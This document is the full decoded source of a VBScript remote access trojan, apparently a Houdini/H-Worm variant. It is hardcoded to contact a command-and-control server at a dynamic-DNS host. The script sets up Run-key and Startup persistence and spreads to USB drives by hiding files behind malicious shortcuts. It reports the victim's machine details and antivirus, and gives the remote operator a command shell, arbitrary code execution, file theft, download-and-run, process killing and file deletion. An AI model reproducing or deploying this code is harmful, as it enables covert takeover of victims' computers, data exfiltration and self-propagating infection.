houdini-fx decoded java.vbs

1. 'from java.vbs c8a01799758c210f73a5765f9498f121 boube
2. '<[ recoder : houdini (c) skype : houdini-fx ]>
3.  
4. '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
5.  
6. host = "mysarab.no-ip.biz"
7. port = 630
8. installdir = "%temp%"
9. lnkfile = true
10. lnkfolder = true
11.  
12. '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
13.  
14. dim shellobj
15. set shellobj = wscript.createobject("wscript.shell")
16. dim filesystemobj
17. set filesystemobj = createobject("scripting.filesystemobject")
18. dim httpobj
19. set httpobj = createobject("msxml2.xmlhttp")
20.  
21.  
22. '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
23.  
24. installname = wscript.scriptname
25. startup = shellobj.specialfolders ("startup") & "\"
26. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
27. if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
28. spliter = "<" & "|" & ">"
29. sleep = 5000
30. dim response
31. dim cmd
32. dim param
33. info = ""
34. usbspreading = ""
35. startdate = ""
36. dim oneonce
37.  
38. '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
39. on error resume next
40.  
41.  
42. instance
43. while true
44.  
45. install
46.  
47. response = ""
48. response = post ("is-ready","")
49. cmd = split (response,spliter)
50. select case cmd (0)
51. case "excecute"
52.       param = cmd (1)
53.       execute param
54. case "update"
55.       param = cmd (1)
56.       oneonce.close
57.       set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
58.       oneonce.write param
59.       oneonce.close
60.       shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
61.       wscript.quit
62. case "uninstall"
63.       uninstall
64. case "send"
65.       download cmd (1),cmd (2)
66. case "site-send"
67.       sitedownloader cmd (1),cmd (2)
68. case "recv"
69.       param = cmd (1)
70.       upload (param)
71. case  "enum-driver"
72.       post "is-enum-driver",enumdriver  
73. case  "enum-faf"
74.       param = cmd (1)
75.       post "is-enum-faf",enumfaf (param)
76. case  "enum-process"
77.       post "is-enum-process",enumprocess  
78. case  "cmd-shell"
79.       param = cmd (1)
80.       post "is-cmd-shell",cmdshell (param)  
81. case  "delete"
82.       param = cmd (1)
83.       deletefaf (param)
84. case  "exit-process"
85.       param = cmd (1)
86.       exitprocess (param)
87. case  "sleep"
88.       param = cmd (1)
89.       sleep = eval (param)        
90. end select
91.  
92. wscript.sleep sleep
93.  
94. wend
95.  
96.  
97. sub install
98. on error resume next
99. dim lnkobj
100. dim filename
101. dim foldername
102. dim fileicon
103. dim foldericon
104.  
105. upstart
106. for each drive in filesystemobj.drives
107.  
108. if  drive.isready = true then
109. if  drive.freespace  > 0 then
110. if  drive.drivetype  = 1 then
111.     filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
112.     if  filesystemobj.fileexists (drive.path & "\" & installname)  then
113.         filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
114.     end if
115.     for each file in filesystemobj.getfolder( drive.path & "\" ).Files
116.         if not lnkfile then exit for
117.         if  instr (file.name,".") then
118.             if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
119.                 file.attributes = 2+4
120.                 if  ucase (file.name) <> ucase (installname) then
121.                     filename = split(file.name,".")
122.                     set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
123.                     lnkobj.windowstyle = 7
124.                     lnkobj.targetpath = "cmd.exe"
125.                     lnkobj.workingdirectory = ""
126.                     lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
127.                     fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
128.                     if  instr (fileicon,",") = 0 then
129.                         lnkobj.iconlocation = file.path
130.                     else
131.                         lnkobj.iconlocation = fileicon
132.                     end if
133.                     lnkobj.save()
134.                 end if
135.             end if
136.         end if
137.     next
138.     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
139.         if not lnkfolder then exit for
140.         folder.attributes = 2+4
141.         foldername = folder.name
142.         set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
143.         lnkobj.windowstyle = 7
144.         lnkobj.targetpath = "cmd.exe"
145.         lnkobj.workingdirectory = ""
146.         lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
147.         foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
148.         if  instr (foldericon,",") = 0 then
149.             lnkobj.iconlocation = folder.path
150.         else
151.             lnkobj.iconlocation = foldericon
152.         end if
153.         lnkobj.save()
154.     next
155. end If
156. end If
157. end if
158. next
159. err.clear
160. end sub
161.  
162. sub uninstall
163. on error resume next
164. dim filename
165. dim foldername
166.  
167. shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
168. shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
169. filesystemobj.deletefile startup & installname ,true
170. filesystemobj.deletefile wscript.scriptfullname ,true
171.  
172. for  each drive in filesystemobj.drives
173. if  drive.isready = true then
174. if  drive.freespace  > 0 then
175. if  drive.drivetype  = 1 then
176.     for  each file in filesystemobj.getfolder ( drive.path & "\").files
177.          on error resume next
178.          if  instr (file.name,".") then
179.              if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
180.                  file.attributes = 0
181.                  if  ucase (file.name) <> ucase (installname) then
182.                      filename = split(file.name,".")
183.                      filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
184.                  else
185.                      filesystemobj.deletefile (drive.path & "\" & file.name)
186.                  end If
187.              else
188.                  filesystemobj.deletefile (file.path)
189.              end if
190.          end if
191.      next
192.      for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
193.          folder.attributes = 0
194.      next
195. end if
196. end if
197. end if
198. next
199. wscript.quit
200. end sub
201.  
202. function post (cmd ,param)
203.  
204. post = param
205. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
206. httpobj.setrequestheader "user-agent:",information
207. httpobj.send param
208. post = httpobj.responsetext
209. end function
210.  
211. function information
212. on error resume next
213. if  inf = "" then
214.     inf = hwid & spliter
215.     inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
216.     inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter
217.  
218.     set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
219.     set os = root.execquery ("select * from win32_operatingsystem")
220.     for each osinfo in os
221.        inf = inf & osinfo.caption & spliter  
222.        exit for
223.     next
224.     inf = inf & "plus" & spliter
225.     inf = inf & security & spliter
226.     inf = inf & usbspreading
227.     information = inf  
228. else
229.     information = inf
230. end if
231. end function
232.  
233.  
234. sub upstart ()
235. on error resume Next
236.  
237. shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
238. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
239. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
240. filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
241.  
242. end sub
243.  
244.  
245. function hwid
246. on error resume next
247.  
248. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
249. set disks = root.execquery ("select * from win32_logicaldisk")
250. for each disk in disks
251.     if  disk.volumeserialnumber <> "" then
252.         hwid = disk.volumeserialnumber
253.         exit for
254.     end if
255. next
256. end function
257.  
258.  
259. function security
260. on error resume next
261.  
262. security = ""
263.  
264. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
265. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
266. for each objitem in colitems
267.     versionstr = split (objitem.version,".")
268. next
269. versionstr = split (colitems.version,".")
270. osversion = versionstr (0) & "."
271. for  x = 1 to ubound (versionstr)
272.      osversion = osversion &  versionstr (i)
273. next
274. osversion = eval (osversion)
275. if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
276.  
277. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
278. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
279.  
280. for each objantivirus in colantivirus
281.     security  = security  & objantivirus.displayname & " ."
282. next
283. if security  = "" then security  = "nan-av"
284. end function
285.  
286.  
287. function instance
288. on error resume next
289.  
290. usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
291. if usbspreading = "" then
292.    if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
293.       usbspreading = "true - " & date
294.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
295.    else
296.       usbspreading = "false - " & date
297.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
298.  
299.    end if
300. end If
301.  
302.  
303.  
304. upstart
305. set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
306. set installfullnameshort =  filesystemobj.getfile (installdir & installname)
307. if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
308.     shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
309.     wscript.quit
310. end If
311. err.clear
312. set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
313. if  err.number > 0 then wscript.quit
314. end function
315.  
316.  
317. sub sitedownloader (fileurl,filename)
318.  
319. strlink = fileurl
320. strsaveto = installdir & filename
321. set objhttpdownload = createobject("msxml2.xmlhttp" )
322. objhttpdownload.open "get", strlink, false
323. objhttpdownload.send
324.  
325. set objfsodownload = createobject ("scripting.filesystemobject")
326. if  objfsodownload.fileexists (strsaveto) then
327.     objfsodownload.deletefile (strsaveto)
328. end if
329.  
330. if objhttpdownload.status = 200 then
331.    dim  objstreamdownload
332.    set  objstreamdownload = createobject("adodb.stream")
333.    with objstreamdownload
334.         .type = 1
335.         .open
336.         .write objhttpdownload.responsebody
337.         .savetofile strsaveto
338.         .close
339.    end with
340.    set objstreamdownload = nothing
341. end if
342. if objfsodownload.fileexists(strsaveto) then
343.    shellobj.run objfsodownload.getfile (strsaveto).shortpath
344. end if
345. end sub
346.  
347. sub download (fileurl,filedir)
348.  
349. if filedir = "" then
350.    filedir = installdir
351. end if
352.  
353. strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
354. set objhttpdownload = createobject("msxml2.xmlhttp")
355. objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
356. objhttpdownload.send ""
357.      
358. set objfsodownload = createobject ("scripting.filesystemobject")
359. if  objfsodownload.fileexists (strsaveto) then
360.     objfsodownload.deletefile (strsaveto)
361. end if
362. if  objhttpdownload.status = 200 then
363.     dim  objstreamdownload
364.     set  objstreamdownload = createobject("adodb.stream")
365.     with objstreamdownload
366.          .type = 1
367.          .open
368.          .write objhttpdownload.responsebody
369.          .savetofile strsaveto
370.          .close
371.     end with
372.     set objstreamdownload  = nothing
373. end if
374. if objfsodownload.fileexists(strsaveto) then
375.    shellobj.run objfsodownload.getfile (strsaveto).shortpath
376. end if
377. end sub
378.  
379.  
380. function upload (fileurl)
381.  
382. dim  httpobj,objstreamuploade,buffer
383. set  objstreamuploade = createobject("adodb.stream")
384. with objstreamuploade
385.      .type = 1
386.      .open
387.      .loadfromfile fileurl
388.      buffer = .read
389.      .close
390. end with
391. set objstreamdownload = nothing
392. set httpobj = createobject("msxml2.xmlhttp")
393. httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
394. httpobj.send buffer
395. end function
396.  
397.  
398. function enumdriver ()
399.  
400. for  each drive in filesystemobj.drives
401. if   drive.isready = true then
402.      enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
403. end if
404. next
405. end Function
406.  
407. function enumfaf (enumdir)
408.  
409. enumfaf = enumdir & spliter
410. for  each folder in filesystemobj.getfolder (enumdir).subfolders
411.      enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
412. next
413.  
414. for  each file in filesystemobj.getfolder (enumdir).files
415.      enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter
416.  
417. next
418. end function
419.  
420.  
421. function enumprocess ()
422.  
423. on error resume next
424.  
425. set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
426. set colitems = objwmiservice.execquery("select * from win32_process",,48)
427.  
428. dim objitem
429. for each objitem in colitems
430.     enumprocess = enumprocess & objitem.name & "|"
431.     enumprocess = enumprocess & objitem.processid & "|"
432.     enumprocess = enumprocess & objitem.executablepath & spliter
433. next
434. end function
435.  
436. sub exitprocess (pid)
437. on error resume next
438.  
439. shellobj.run "taskkill /F /T /PID " & pid,7,true
440. end sub
441.  
442. sub deletefaf (url)
443. on error resume next
444.  
445. filesystemobj.deletefile url
446. filesystemobj.deletefolder url
447.  
448. end sub
449.  
450. function cmdshell (cmd)
451.  
452. dim httpobj,oexec,readallfromany
453.  
454. set oexec = shellobj.exec ("%comspec% /c " & cmd)
455. if not oexec.stdout.atendofstream then
456.    readallfromany = oexec.stdout.readall
457. elseif not oexec.stderr.atendofstream then
458.    readallfromany = oexec.stderr.readall
459. else
460.    readallfromany = ""
461. end if
462.  
463. cmdshell = readallfromany
464. end function